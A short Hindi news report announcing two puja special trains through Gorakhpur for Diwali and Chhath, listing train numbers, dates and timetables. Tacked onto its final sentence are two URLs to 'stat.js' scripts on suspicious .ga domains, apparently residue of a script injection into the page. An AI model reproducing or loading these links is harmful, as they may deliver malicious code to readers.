दीपावली और छठ पर्व के अवशर पर यात्रा करने वाले यात्रियों के लिए राहत भरी खबर आई है। गोरखपुर के रास्ते दो और पूजा स्पेशल ट्रेन रेलवे बोर्ड ने चलाने की घोषणा की है। चलाए जाने वाली दो ट्रेनों में से, एक ट्रेन कटिहार- आनंद विहार के बीच 10 से 23 नवंबर तक चलाई जाएगी और वहीं दूसरी ट्रेन सहरसा और आनंद विहार के बीच 8 से 23 नवंबर तक चलाई जाएगी।
गाड़ी संख्या 04424 आनंद विहार टर्मिनल- कटिहार स्पेशल ट्रेन 10 से 22 नवंबर तक रोज दोपहर 3:20 बजे से चलाई जाएगी और कानपुर के रास्ते दूसरे दिन गोरखपुर से सुबह 6:00 बजे से छुटकारा रात 7:55 बजे कटिहार पहुंचेगी। वही वापसी के लिए गाड़ी संख्या 04423 कटिहार- आनंद विहार टर्मिनल स्पेशल ट्रेन 11 से 23 नवंबर तक रोज कटिहार स्टेशन से रात 10:00 से चलेगी और छपरा के रास्ते दूसरे दिन गोरखपुर से दोपहर 12:35 बजे से चलकर रात 2:55 बजे आनंद विहार टर्मिनल पहुंचेगी।
गाड़ी संख्या 04432 आनंद विहार टर्मिनल- सहरसा स्पेशल ट्रेन 8 से 22 नवंबर तक चलेगी। यह ट्रेन प्रत्येक रविवार को आनंद विहार टर्मिनल से सुबह 11:00 बजे से रवाना होगी और मुरादाबाद के रास्ते गोरखपुर पहुंच कर रात 12:55 बजे छूटेगी, दूसरे दिन सुबह 11:30 बजे सहरसा पहुंचेगी। गाड़ी संख्या 04431 सहरसा- आनंद विहार टर्मिनल स्पेशल ट्रेन 9 से 23 नवंबर तक चलाई जाएगी। यह ट्रेन प्रत्येक सोमवार को दोपहर 2:30 बजे से रवाना होगी और छपरा होते हुए गोरखपुर रात 12:00 बजे से छूटकर दूसरे दिन सुबह 1:45 बजे आनंद विहार टर्मिनल पहुंचेगी।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms